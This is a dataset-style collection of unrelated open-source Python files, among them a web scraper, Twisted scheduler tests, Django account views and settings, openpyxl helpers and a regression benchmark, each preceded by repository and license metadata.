from api import environ
|
print(environ['USER'])
|
nbi-opendata/metadaten-scraper
|
get-metadata.py
|
Python
|
mit
| 3,412
| 0.003224
|
import json, io, re, requests
from bs4 import BeautifulSoup
from datetime import datetime
def get_datasets(url):
r = requests.get(url.format(0))
soup = BeautifulSoup(r.text)
href = soup.select('#block-system-main a')[-1]['href']
last_page = int(re.match(r'.*page=(.*)', href).group(1))
for page in range(last_page + 1):
print( '[DEBUG] page:', page )
r = requests.get(url.format(page))
soup = BeautifulSoup(r.text)
for link in soup.select('h2 a'):
yield (link['href'], link.text)
def get_metadata(url):
r = requests.get(url)
soup = BeautifulSoup(r.text)
metadata = dict()
metadata['_url'] = url.format(d)
metadata['_collection_date'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
for elem in soup.select('.datasetview_container .datasetview_row'):
for field in elem.select('.field'):
label = field.select('.field-label')[0].text[:-2]
item_list = list()
item = field.select('.field-item')
if label == 'Website':
metadata[label] = item[0].select('a')[0]['href']
elif len(item) == 0:
items = elem.select('.tag_list a')
for i in items:
item_list.append(i.text.strip())
metadata[label] = item_list
else:
metadata[label] = item[0].text.strip()
tags = set()
for elem in soup.select('.tag_list a'):
tags.add(elem.text.strip())
metadata['tags'] = list(tags)
return metadata
if __name__ == '__main__':
base_url = 'http://daten.berlin.de{}'
datasets_url = 'http://daten.berlin.de/datensaetze?page={}'
documents_url = 'http://daten.berlin.de/dokumente?page={}'
all_labels = set()
all_metadata = list()
done_datasets = set()
# iterate over all dataset urls
for d, t in get_datasets(datasets_url):
if d in done_datasets:
print('skip', d)
continue # skip datasets
m = get_metadata(base_url.format(d))
m['_type
|
'] = 'dataset'
m['_title'] = t
a
|
ll_metadata.append(m)
for k in m.keys(): all_labels.add(k)
print(json.dumps(m, sort_keys=1, ensure_ascii=False))
done_datasets.add(d)
# iterate over all document urls
for d, t in get_datasets(documents_url):
if d in done_datasets:
print('skip', d)
continue # skip datasets
m = get_metadata(base_url.format(d))
m['_type'] = 'document'
m['_title'] = t
all_metadata.append(m)
for k in m.keys(): all_labels.add(k)
print(json.dumps(m, sort_keys=1, ensure_ascii=False))
done_datasets.add(d)
# write json file
with io.open('daten-berlin_metadata.json', 'w', encoding='utf8') as json_file:
json_file.write((json.dumps(all_metadata, indent=2, sort_keys=True, ensure_ascii=False)))
# write csv
with open('daten-berlin_metadata.csv', 'wb') as csv_file:
for l in sorted(all_labels):
csv_file.write((l + ';').encode('utf8'))
csv_file.write('\n'.encode('utf8'))
for m in all_metadata:
for l in sorted(all_labels):
if l in m:
csv_file.write(str(m[l]).encode('utf8'))
csv_file.write(';'.encode('utf8'))
csv_file.write('\n'.encode('utf8'))
|
PMBio/limix
|
External/nlopt/test/test_std.py
|
Python
|
apache-2.0
| 727
| 0
|
# #!/usr/bin/env python
#
# import nlopt # THIS IS NOT A PACKAGE!
# import num
|
py as np
#
# print(('nlopt version='+nlopt.__version__))
#
# def f(x, grad):
# F=x[0]
# L=x[1]
# E=x[2]
# I=x[3]
# D=F*L**3/(3.*E*I)
# return D
#
# n = 4
# opt = nlopt.opt(nlopt.LN_COBYLA, n)
# opt.set_min_objective(f)
# lb = np.array([40., 50., 30e3, 1.])
# ub = np.array([60., 60., 40e3, 10.])
# x = (lb+ub)/2.
# opt.set_low
|
er_bounds(lb)
# opt.set_upper_bounds(ub)
# opt.set_xtol_rel(1e-3)
# opt.set_ftol_rel(1e-3)
# xopt = opt.optimize(x)
#
# opt_val = opt.last_optimum_value()
# result = opt.last_optimize_result()
# print(('opt_result='+str(result)))
# print(('optimizer='+str(xopt)))
# print(('opt_val='+str(opt_val)))
|
rfancn/wxgigo
|
wxgigo/wxmp/sdk/plugin/fshelper.py
|
Python
|
mit
| 5,556
| 0.00324
|
#!/usr/bin/env python
# coding=utf-8
"""
Copyright (C) 2010-2013, Ryan Fan <ryan.fan@oracle.com>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Library General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""
from __future__ import absolute_import
import os
import sys
import logging
logger = logging.getLogger(__name__)
from sdk.constants import *
from sdk.utils import load_class
from sdk.plugin.base import BasePlugin
from sdk.plugin.config import BasePluginConfig
class FSPluginHelper(object):
"""
Filesystem Plugin helper functions
"""
def __init__(self, app):
super(FSPluginHelper, self).__init__()
self.plugins_dir = app.config.plugins_dir
# make sure plugins dir is in python search path
sys.path.insert(1, self.plugins_dir)
def __is_valid_plugin_module(self, plugin_name):
# check if "plugin.py" under plugin package
PLUGIN_FILE = os.path.join(self.plugins_dir, "{0}".format(plugin_name.lower()), "plugin.py")
if not os.path.exists(PLUGIN_FILE):
print "no plugin.py file under {0} plugin package".format(plugin_name)
return False
return True
def fs_get_plugin_class(self, plugin_name):
"""
Dynamically retrieve plugin class from filesystem
@param plugin_name: plugin name, it is a package name under plugins base directory
@return cls: valid Plugin class name
"""
#if not self.__is_valid_plugin_module(plugin_name):
# print "Invalid plugin module: {0}".format(plugin_name)
# return None
try:
# here must conver
|
t plugin name to lowercased one
module_path = "{0}.plugin".format(plugin_name.lower())
cls = load_class(module_path, WXMP_PLUGIN_CLASS_NAME)
if not issubclass(cls, BasePlugin):
print "Object: {
|
0} is not a subclass of BasePlugin".format(cls)
return None
except Exception,e:
raise e
return cls
def fs_get_plugin_config_class(self, plugin_name):
"""
Dynamically retrieve plugin class from filesystem
@param plugin_name: plugin name, it is a package name under plugins base directory
@return cls: valid Plugin class name
"""
if not self.__is_valid_plugin_module(plugin_name):
print "Invalid plugin module: {0}".format(plugin_name)
return None
try:
# here must convert plugin name to lowercased one
module_path = "{0}.plugin".format(plugin_name.lower())
cls = load_class(module_path, WXMP_PLUGIN_CONFIG_CLASS_NAME)
if not issubclass(cls, BasePluginConfig):
print "Object: {0} is not a subclass of BasePluginConfig".format(cls)
return None
except Exception,e:
print "Warning: No {0} plugin config class because of: {1}".format(plugin_name, e)
return None
return cls
def __build_meta_dict(self, plugin_instance):
"""
Build meta dict from plugin instance as below:
{ 'name':'x','version': '0.1', ...}
@param: plugin instance
@return: meta dict
"""
meta_dict = {}
for k in BasePlugin.meta_keys:
meta_dict[k] = plugin_instance.__class__.__dict__[k]
return meta_dict
def fs_get_meta_all(self):
"""
Get all plugins meta list from filesystem
"""
meta_list = []
all_plugin_instances = self.fs_get_plugin_instances_all()
for pinstance in all_plugin_instances:
d = self.__build_meta_dict(pinstance)
meta_list.append(d)
return meta_list
def fs_get_meta(self, plugin_name):
"""
Get specific plugin's meta dict by plugin name
"""
plugin_instance = self.fs_get_plugin_instance(plugin_name)
if not plugin_instance:
return {}
return self.__build_meta_dict(plugin_instance)
def fs_get_plugin_instance(self, plugin_name):
plugin_class = self.fs_get_plugin_class(plugin_name)
if not plugin_class:
return None
try:
plugin_instance = plugin_class()
except Exception,e:
raise e
return plugin_instance
def fs_get_plugin_instances_all(self):
"""
Probe plugin package deployed in filesystem and try to initialize plugin instances
@return: the list of plugin instance
"""
# get the top-level dir under plugin parent dir
plugin_instance_list = []
plugin_name_list = os.walk(self.plugins_dir).next()[1]
for plugin_name in plugin_name_list:
plugin_instance = self.fs_get_plugin_instance(plugin_name)
if plugin_instance:
plugin_instance_list.append(plugin_instance)
return plugin_instance_list
|
mpdevilleres/tbpc_app
|
tbpc/resource_mgt/utils.py
|
Python
|
mit
| 5,806
| 0.002756
|
#!/usr/bin/env python
import copy
import datetime as dt
import re
from decimal import Decimal, InvalidOperation
from openpyxl import *
from openpyxl.cell import Cell
from openpyxl.utils import get_column_letter
from openpyxl.worksheet import Worksheet
# OPENPYXL WITH INSERT ROW
# ----------------------------------------------------------------------------------------------------
def insert_rows(self, row_idx, cnt, above=False, copy_style=True, fill_formulae=True):
"""Inserts new (empty) rows into worksheet at specified row index.
:param self: Class object
:param row_idx: Row index specifying where to insert new rows.
:param cnt: Number of rows to insert.
:param above: Set True to insert rows above specified row index.
:param copy_style: Set True if new rows should copy style of immediately above row.
:param fill_formulae: Set True if new rows should take on formula from immediately above row, filled with references new to rows.
Usage:
* insert_rows(2, 10, above=True, copy_style=False)
"""
CELL_RE = re.compile("(?P<col>\$?[A-Z]+)(?P<row>\$?\d+)")
row_idx = row_idx - 1 if above else row_idx
def replace(m):
row = m.group('row')
prefix = "$" if row.find("$") != -1 else ""
row = int(row.replace("$", ""))
|
row += cnt if row > row_idx else 0
return m.group('col') + prefix + str(row)
# First, we shift all cells down cnt rows...
old_cells = set()
old_fas = set(
|
)
new_cells = dict()
new_fas = dict()
for c in self._cells.values():
old_coor = c.coordinate
# Shift all references to anything below row_idx
if c.data_type == Cell.TYPE_FORMULA:
c.value = CELL_RE.sub(
replace,
c.value
)
# Here, we need to properly update the formula references to reflect new row indices
if old_coor in self.formula_attributes and 'ref' in self.formula_attributes[old_coor]:
self.formula_attributes[old_coor]['ref'] = CELL_RE.sub(
replace,
self.formula_attributes[old_coor]['ref']
)
# Do the magic to set up our actual shift
if c.row > row_idx:
old_coor = c.coordinate
old_cells.add((c.row, c.col_idx))
c.row += cnt
new_cells[(c.row, c.col_idx)] = c
if old_coor in self.formula_attributes:
old_fas.add(old_coor)
fa = self.formula_attributes[old_coor].copy()
new_fas[c.coordinate] = fa
for coor in old_cells:
del self._cells[coor]
self._cells.update(new_cells)
for fa in old_fas:
del self.formula_attributes[fa]
self.formula_attributes.update(new_fas)
# Next, we need to shift all the Row Dimensions below our new rows down by cnt...
for row in range(len(self.row_dimensions) - 1 + cnt, row_idx + cnt, -1):
new_rd = copy.copy(self.row_dimensions[row - cnt])
new_rd.index = row
self.row_dimensions[row] = new_rd
del self.row_dimensions[row - cnt]
# Now, create our new rows, with all the pretty cells
row_idx += 1
for row in range(row_idx, row_idx + cnt):
# Create a Row Dimension for our new row
new_rd = copy.copy(self.row_dimensions[row - 1])
new_rd.index = row
self.row_dimensions[row] = new_rd
for col in range(1, self.max_column):
col = get_column_letter(col)
cell = self.cell('%s%d' % (col, row))
cell.value = None
source = self.cell('%s%d' % (col, row - 1))
if copy_style:
cell.number_format = source.number_format
cell.font = source.font.copy()
cell.alignment = source.alignment.copy()
cell.border = source.border.copy()
cell.fill = source.fill.copy()
if fill_formulae and source.data_type == Cell.TYPE_FORMULA:
s_coor = source.coordinate
if s_coor in self.formula_attributes and 'ref' not in self.formula_attributes[s_coor]:
fa = self.formula_attributes[s_coor].copy()
self.formula_attributes[cell.coordinate] = fa
# print("Copying formula from cell %s%d to %s%d"%(col,row-1,col,row))
cell.value = re.sub(
"(\$?[A-Z]{1,3}\$?)%d" % (row - 1),
lambda m: m.group(1) + str(row),
source.value
)
cell.data_type = Cell.TYPE_FORMULA
# Check for Merged Cell Ranges that need to be expanded to contain new cells
for cr_idx, cr in enumerate(self.merged_cell_ranges):
self.merged_cell_ranges[cr_idx] = CELL_RE.sub(
replace,
cr
)
Worksheet.insert_rows = insert_rows
# ----------------------------------------------------------------------------------------------------
# END OPENPYXL
# MISC
# ----------------------------------------------------------------------------------------------------
def to_bool(data):
if isinstance(data, str):
data = data.lower()
if data == "0" or data == "false":
return False
elif data == "1" or data == "true":
return True
return NotImplemented
def to_date_format(string):
# remove time element
string = string.split(' ')[0]
try:
return dt.datetime.strptime(string, '%d/%m/%Y')
except ValueError:
return None
def to_dec(data):
try:
return Decimal(data)
except InvalidOperation:
return Decimal('0')
# ----------------------------------------------------------------------------------------------------
# END MISC
|
kenorb-contrib/BitTorrent
|
twisted/test/test_task.py
|
Python
|
gpl-3.0
| 6,793
| 0.004122
|
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.trial import unittest
from twisted.internet import task, reactor, defer
from twisted.python import failure
class TestableLoopingCall(task.LoopingCall):
def __init__(self, clock, *a, **kw):
super(TestableLoopingCall, self).__init__(*a, **kw)
self._callLater = lambda delay: clock.callLater(delay, self)
self._seconds = clock.seconds
class FakeDelayedCall(object):
def __init__(self, when, clock, what, a, kw):
self.clock = clock
self.when = when
self.what = what
self.a = a
self.kw = kw
def __call__(self):
return self.what(*self.a, **self.kw)
def __repr__(self):
return "<FakeDelayedCall of %r>" % (self.what,)
def cancel(self):
self.clock.calls.remove((self.when, self))
class Clock(object):
rightNow = 0.0
def __init__(self):
self.calls = []
def seconds(self):
return self.rightNow
def callLater(self, when, what, *a, **kw):
self.calls.append((self.seconds() + when, FakeDelayedCall(self.seconds() + when, self, what, a, kw)))
return self.calls[-1][1]
def adjust(self, amount):
self.rightNow += amount
def runUntilCurrent(self):
while self.calls and self.calls[0][0] <= self.seconds():
when, call = self.calls.pop(0)
call()
def pump(self, timings):
timings = list(timings)
timings.reverse()
self.calls.sort()
while timings:
self.adjust(timings.pop())
self.runUntilCurrent()
class TestException(Exception):
pass
class LoopTestCase(unittest.TestCase):
def testBasicFunction(self):
# Arrange to have time advanced enough so that our function is
# called a few times.
# Only need to go to 2.5 to get 3 calls, since the first call
# happens before any time has elapsed.
timings = [0.05, 0.1, 0.1]
clock = Clock()
L = []
def foo(a, b, c=None, d=None):
L.append((a, b, c, d))
lc = TestableLoopingCall(clock, foo, "a", "b", d="d")
D = lc.start(0.1)
theResult = []
def saveResult(result):
theResult.append(result)
D.addCallback(saveResult)
clock.pump(timings)
self.assertEquals(len(L), 3,
"got %d iterations, not 3" % (len(L),))
for (a, b, c, d) in L:
self.assertEquals(a, "a")
self.assertEquals(b, "b")
self.assertEquals(c, None)
self.assertEquals(d, "d")
lc.stop()
self.assertIdentical(theResult[0], lc)
# Make sure it isn't planning to do anything further.
self.failIf(clock.calls)
def testDelayedStart(self):
timings = [0.05, 0.1, 0.1]
clock = Clock()
L = []
lc = TestableLoopingCall(clock, L.append, None)
d = lc.start(0.1, now=False)
theResult = []
def saveResult(result):
theResult.append(result)
d.addCallback(saveResult)
clock.pump(timings)
self.assertEquals(len(L), 2,
"got %d iterations, not 2" % (len(L),))
lc.stop()
self.assertIdentical(theResult[0], lc)
self.failIf(clock.calls)
def testBadDelay(self):
lc = task.LoopingCall(lambda: None)
self.assertRaises(ValueError, lc.start, -1)
# Make sure that LoopingCall.stop() prevents any subsequent calls.
def _stoppingTest(self, delay):
ran = []
def foo():
ran.append(None)
clock = Clock()
lc = TestableLoopingCall(clock, foo)
d = lc.start(delay, now=False)
lc.stop()
self.failIf(ran)
self.failIf(clock.calls)
def testStopAtOnce(self):
return self._stoppingTest(0)
def testStoppingBeforeDelayedStart(self):
return self._stoppingTest(10)
class ReactorLoopTestCase(unittest.TestCase):
# Slightly inferior tests which exercise interactions with an actual
# reactor.
def testFailure(self):
def foo(x):
raise TestException(x)
lc = task.LoopingCall(foo, "bar")
return self.assertFailure(lc.start(0.1), TestException)
def testFailAndStop(self):
def foo(x):
lc.stop()
raise TestException(x)
lc = task.LoopingCall(foo, "bar")
return self.assertFailure(lc.start(0.1), TestException)
def testEveryIteration(self):
ran = []
def foo():
ran.append(None)
if len(ran) > 5:
lc.stop()
lc = task.LoopingCall(foo)
d = lc.start(0)
def stopped(ign):
self.assertEquals(len(ran), 6)
return d.addCallback(stopped)
def testStopAtOnceLater(self):
# Ensure that even when LoopingCall.stop() is called from a
# reactor callback, it still prevents any subsequent calls.
d = defer.Deferred()
def foo():
d.errback(failure.DefaultException(
"This task also should never get called."))
self._lc = task.LoopingCall(foo)
self._lc.start(1, now=False)
reactor.callLater(0, self._callback_for_testStopAtOnc
|
eLater, d)
return d
def _callback_for_testStopAtOnceLater(self, d):
self._lc.stop()
reactor.callLater(0, d.callback, "success")
def testWaitDeferred(self):
|
# Tests if the callable isn't scheduled again before the returned
# deferred has fired.
timings = [0.2, 0.8]
clock = Clock()
def foo():
d = defer.Deferred()
d.addCallback(lambda _: lc.stop())
clock.callLater(1, d.callback, None)
return d
lc = TestableLoopingCall(clock, foo)
d = lc.start(0.2)
clock.pump(timings)
self.failIf(clock.calls)
def testFailurePropagation(self):
# Tests if the failure of the errback of the deferred returned by the
# callable is propagated to the lc errback.
#
# To make sure this test does not hang trial when LoopingCall does not
# wait for the callable's deferred, it also checks there are no
# calls in the clock's callLater queue.
timings = [0.3]
clock = Clock()
def foo():
d = defer.Deferred()
clock.callLater(0.3, d.errback, TestException())
return d
lc = TestableLoopingCall(clock, foo)
d = lc.start(1)
self.assertFailure(d, TestException)
clock.pump(timings)
self.failIf(clock.calls)
return d
|
gnovis/swift
|
swift_fca/swift_core/object_fca.py
|
Python
|
gpl-3.0
| 131
| 0
|
class Object:
def __init__(self, name):
self._name = nam
|
e
@property
def name(self):
return self._name
| |
yourcelf/btb
|
scanblog/accounts/views.py
|
Python
|
agpl-3.0
| 2,880
| 0.002431
|
"""
This app is a simple extension of built in auth_views which overrides login and
logout to provide messages on successful login/out.
"""
from django.contrib.auth import views as auth_views
from django.utils.translation import ugettext as _
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.auth.forms import SetPasswordForm, PasswordChangeForm
from django.contrib import messages
from django.shortcuts import render
from django.template import RequestContext
from django.http import HttpResponseRedirect, HttpResponse
from django.contrib.auth.decorators import login_required
from btb.utils import can_edit_user
from accounts.forms import OptionalEmailForm
from registration.backends.simple.views import RegistrationView
def login(request, *args, **kwargs):
kwargs['extra_context'] = {
'reg_form': OptionalEmailForm(auto_id="regid_%s")
}
response = auth_views.login(request, *args, **kwargs)
return response
def logout(request, *args, **kwargs):
messages.success(request, _("Successfully logged out."))
response = auth_views.logout(request, *args, **kwargs)
return response
def check_username_availability(request):
username = request.GET.get('username', None)
if not username:
response = HttpResponse('{"result": null}')
if User.objects.filter(username=username).exists():
response = HttpResponse('{"result": "taken"}')
else:
response = HttpResponse('{"result": "available"}')
response['Content-Type'] = "application/json"
return re
|
sponse
def change_password(request, user_id):
"""
Change the password of the user with the given user_id. Checks for
permission to change users.
"""
if not can_edit_user(request.user, user_id):
raise PermissionDenied
if request.user.id ==
|
int(user_id):
Form = PasswordChangeForm
else:
Form = SetPasswordForm
user = User.objects.get(id=user_id)
if request.POST:
form = Form(user, request.POST)
if form.is_valid():
form.save()
messages.success(request, _("Password changed successfully."))
return HttpResponseRedirect(reverse("profiles.profile_edit", args=[user_id]))
else:
form = Form(request.user)
return render(request, "registration/password_change_form.html", {
'form': form,
'change_user': user,
})
@login_required
def welcome(request):
return render(request, 'registration/welcome.html')
class OptionalEmailRegistrationView(RegistrationView):
form_class = OptionalEmailForm
def get_success_url(self, user):
if 'after_login' in self.request.session:
return self.request.session.pop('after_login')
return reverse("accounts-post-registration")
|
codeka/wwmmo
|
website/handlers/blog.py
|
Python
|
mit
| 1,074
| 0.015829
|
import datetime
from flask import abort, render_template, request, redirect, Response
import ctrl.blog
from . import handlers
@handlers.route('/blog')
def blog_index():
pageNo = 0
if request.args.get('page'):
pageNo = int(request.args.get('page'))
if pageNo < 0:
pageNo = 0
posts = ctrl.blog.getPosts(pageNo)
if not posts and pageNo > 0:
redirect('/blog?page=%d' % (pageNo - 1))
return render_template('blog/index.html', posts=posts, pageNo=pageNo)
@handlers.route('/blog/<year>/<month>/<slug>')
def blog_post(year, month, slug):
post
|
= ctrl.blog.getPostBySlug(int(year), int(month), slug)
if not post:
abort(404)
return render_template('blog/post.html', post=post)
@handlers.route('/blog/rss')
def blog_rss():
posts = ctrl.blog.getPosts(0, 15)
pubDate = datetime.time()
if posts and len(posts) > 0:
pubDate = posts[0].posted
return Response(
render_template('blog/rss.xml', posts=posts,
|
pubDate=pubDate.strftime('%a, %d %b %Y %H:%M:%S GMT')),
content_type='application/rss+xml')
|
sheeshmohsin/venturesity
|
flexy/flexy/settings.py
|
Python
|
mit
| 5,241
| 0.000763
|
# Django settings for flexy project.
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django_mongodb_engine',
'NAME': 'sheesh',
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = u'54c3c2ebf0d6142f25b84dce'
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# See: https://docs.djangopr
|
oject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# END MEDIA CONFIGURATION
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory
|
yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '9j(dx#&1&_s5^a71r4%+ct64(22rv6sm@ly07%1fwu4ta##&q)'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.messages.context_processors.messages',
'django.contrib.auth.context_processors.auth',
)
ROOT_URLCONF = 'flexy.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'flexy.wsgi.application'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates')
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
'bootstrap3',
'app',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
florian-f/sklearn
|
benchmarks/bench_sgd_regression.py
|
Python
|
bsd-3-clause
| 4,512
| 0.002216
|
"""
Benchmark for SGD regression
Compares SGD regression against coordinate descent and Ridge
on synthetik data.
"""
print(__doc__)
# Author: Peter Prettenhofer <peter.prettenhofer@gmail.com>
# License: BSD Style.
import numpy as np
import pylab as pl
import gc
from time import time
from sklearn.linear_model import Ridge, SGDRegressor, ElasticNet
from sklearn.metrics import mean_squared_error
from sklearn.datasets.samples_generator import make_regression
if __name__ == "__main__":
list_n_samples = np.linspace(100, 10000, 5).astype(np.int)
list_n_features = [10, 100, 1000]
n_test = 1000
noise = 0.1
alpha = 0.01
sgd_results = np.zeros((len(list_n_samples), len(list_n_features), 2))
elnet_results = np.zeros((len(list_n_samples), len(list_n_features), 2))
ridge_results = np.zeros((len(list_n_samples), len(list_n_features), 2))
for i, n_train in enumerate(list_n_samples):
for j, n_features in enumerate(list_n_features):
X, y, coef = make_regression(
n_samples=n_train + n_test, n_features=n_features,
noise=noise, coef=True)
X_train = X[:n_train]
y_train = y[:n_train]
X_test = X[n_train:]
y_test = y[n_train:]
print("=======================")
print("Round %d %d" % (i, j))
print("n_features:", n_features)
print("n_samples:", n_train)
# Shuffle data
idx = np.arange(n_train)
np.random.seed(13)
np.random.shuffle(idx)
X_train = X_train[idx]
y_train = y_train[idx]
std = X_train.std(axis=0)
mean = X_train.mean(axis=0)
X_train = (X_train - mean) / std
X_test = (X_test - mean) / std
std = y_train.std(axis=0)
mean = y_train.mean(axis=0)
y_train = (y_train - mean) / std
y_test = (y_test - mean) / std
gc.collect()
print("- benching ElasticNet")
clf = ElasticNet(alpha=alpha, rho=0.5, fit_intercept=False)
tstart = time()
clf.fit(X_train, y_train)
elnet_results[i, j, 0] = mean_squared_error(clf.predict(X_test),
y_test)
elnet_results[i, j, 1] = time() - tstart
gc.collect()
print("- benching SGD")
n_iter = np.ceil(10 ** 4.0 / n_train)
clf = SGDRegressor(alpha=alpha, fit_intercept=False,
n_iter=n_iter, learning_rate="invscaling",
eta0=.01, power_t=0.25)
tstart = time()
clf.fit(X_train, y_train)
sgd_results[i, j, 0] = mean_squared_error(clf.predict(X_test),
y_test)
sgd_results[i, j, 1] = time() - tstart
gc.collect()
print("- benching RidgeRegression")
clf = Ridge(alpha=alpha, fit_intercept=False)
|
tstart = time()
clf.fit(X_train, y_train)
ridge_results[i, j, 0] = mean_squared_error(clf.predict(X_test),
|
y_test)
ridge_results[i, j, 1] = time() - tstart
# Plot results
i = 0
m = len(list_n_features)
pl.figure(figsize=(5 * 2, 4 * m))
for j in range(m):
pl.subplot(m, 2, i + 1)
pl.plot(list_n_samples, np.sqrt(elnet_results[:, j, 0]),
label="ElasticNet")
pl.plot(list_n_samples, np.sqrt(sgd_results[:, j, 0]),
label="SGDRegressor")
pl.plot(list_n_samples, np.sqrt(ridge_results[:, j, 0]),
label="Ridge")
pl.legend(prop={"size": 10})
pl.xlabel("n_train")
pl.ylabel("RMSE")
pl.title("Test error - %d features" % list_n_features[j])
i += 1
pl.subplot(m, 2, i + 1)
pl.plot(list_n_samples, np.sqrt(elnet_results[:, j, 1]),
label="ElasticNet")
pl.plot(list_n_samples, np.sqrt(sgd_results[:, j, 1]),
label="SGDRegressor")
pl.plot(list_n_samples, np.sqrt(ridge_results[:, j, 1]),
label="Ridge")
pl.legend(prop={"size": 10})
pl.xlabel("n_train")
pl.ylabel("Time [sec]")
pl.title("Training time - %d features" % list_n_features[j])
i += 1
pl.subplots_adjust(hspace=.30)
pl.show()
|
srijannnd/Login-and-Register-App-in-Django
|
simplesocial/posts/models.py
|
Python
|
mit
| 984
| 0.003049
|
from django.db import models
from django.core.urlresolvers import reverse
from django.conf import settings
import misaka
from groups.models import Group
# Create your models here.
# POSTS MODELS.PY
from django.contrib.auth import get_user_model
User = get_user_model()
class Post(models.Model):
user = models.ForeignKey(User, related_name='posts')
created_at = models.DateTimeField(auto_now=True)
message = models.TextField()
message_html = models.TextField(editable=False)
group = models.ForeignKey(Group, related_name='pos
|
ts', null=True, blank=True)
def __str__(self):
return self.message
def save(self, *args, **kwargs):
self.message_html = misaka.html(self.message)
super().save(*args, **kwargs)
def get_absolute_url(self):
return reverse('posts:single', kwargs={'username': self.user.username, '
|
pk': self.pk})
class Meta:
ordering = ['-created_at']
unique_together = ['user', 'message']
|
google/google-ctf
|
third_party/edk2/BaseTools/Source/Python/GenFds/CompressSection.py
|
Python
|
apache-2.0
| 3,896
| 0.009497
|
## @file
# process compress section generation
#
# Copyright (c)
|
2007 - 2017, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which
|
accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import absolute_import
from .Ffs import SectionSuffix
from . import Section
import subprocess
import Common.LongFilePathOs as os
from .GenFdsGlobalVariable import GenFdsGlobalVariable
from CommonDataClass.FdfClass import CompressSectionClassObject
from Common.DataType import *
## generate compress section
#
#
class CompressSection (CompressSectionClassObject) :
## compress types: PI standard and non PI standard
CompTypeDict = {
'PI_STD' : 'PI_STD',
'PI_NONE' : 'PI_NONE'
}
## The constructor
#
# @param self The object pointer
#
